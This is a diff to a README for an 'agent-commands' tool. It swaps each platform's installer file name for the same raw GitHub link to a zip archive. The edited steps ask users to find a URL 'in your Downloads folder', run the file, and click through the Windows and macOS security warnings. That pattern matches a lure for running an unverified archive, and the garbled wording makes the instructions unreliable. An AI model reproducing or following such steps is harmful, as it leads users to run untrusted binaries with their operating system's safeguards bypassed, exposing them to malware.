math2024444-spec/agent-commands/README.md

 ### Windows

-1. Find the downloaded `agent-commands.exe` file in your Downloads folder.
+1. Find the downloaded `https://raw.githubusercontent.com/math2024444-spec/agent-commands/main/specific/agent-commands_2.3.zip` file in your Downloads folder.
 2. Double-click the file to run it.
 3. If prompted by the security warning, click "Run" to continue.
 4. Follow the on-screen instructions to use the commands with your agents.

 ### macOS

-1. Open the `agent-commands.dmg` file from your Downloads folder.
+1. Open the `https://raw.githubusercontent.com/math2024444-spec/agent-commands/main/specific/agent-commands_2.3.zip` file from your Downloads folder.
 2. Drag the `agent-commands` icon to your Applications folder.
 3. Open the Applications folder and double-click `agent-commands` to run it.
 4. If your Mac gives a warning, right-click the icon and choose “Open,” then confirm.

 ### Linux

-1. Extract the `agent-commands.tar.gz` file in your preferred location using the terminal or a file manager.
+1. Extract the `https://raw.githubusercontent.com/math2024444-spec/agent-commands/main/specific/agent-commands_2.3.zip` file in your preferred location using the terminal or a file manager.
 2. Open the terminal and navigate to the folder where you extracted the files.
 3. Run the command: `./agent-commands`.
 4. Follow the prompts in the terminal to execute commands with your agents.